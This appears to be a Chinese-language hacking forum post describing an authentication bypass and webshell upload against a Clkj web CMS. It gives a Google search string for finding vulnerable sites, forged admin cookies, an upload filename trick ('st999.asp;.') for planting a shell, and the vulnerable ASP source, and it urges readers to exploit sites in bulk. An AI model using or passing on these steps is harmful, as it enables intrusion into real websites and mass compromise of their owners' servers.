Google关键字:inurl:P_view asp?pid=
漏洞文件:Clkj_Inc/WebOut.asp
利用cookies:username=uname=admin;userpas=upas=admin;
打开啊D注入工具或者其他的可以修改cookie的工具,修改成以上的cookies,再登录后台Clkj_Admin/nimda_admin.asp,广告管理,上传图片,有个自定义图片名称的功能,输入st999.asp;.再上传,右键查看源码,拿到shell地址就OK了。
漏洞文件的源码:
WebOut.asp
<% if trim(request.cookies("username")("uname"))<>"" then session("username")=request.cookies("username")("uname") session("userpas")=request.cookies("userpas")("upas") else if trim(session("username"))="" or trim(session("userpas"))="" then Response.Write "<script language='javascript'>alert('用户名与密码为空请重新进入!');top.location.href='index.html';</script>" end if end if %> <script src="http://www.sem-cms.com/huidiao.asp?url=<%=Request.ServerVariables("SERVER_NAME")%>"></script>
看了源码,诸君都了解了吧
喜欢批量的朋友速度吧。。。
我试了下,貌似是通杀以前的版本的。。。。。 |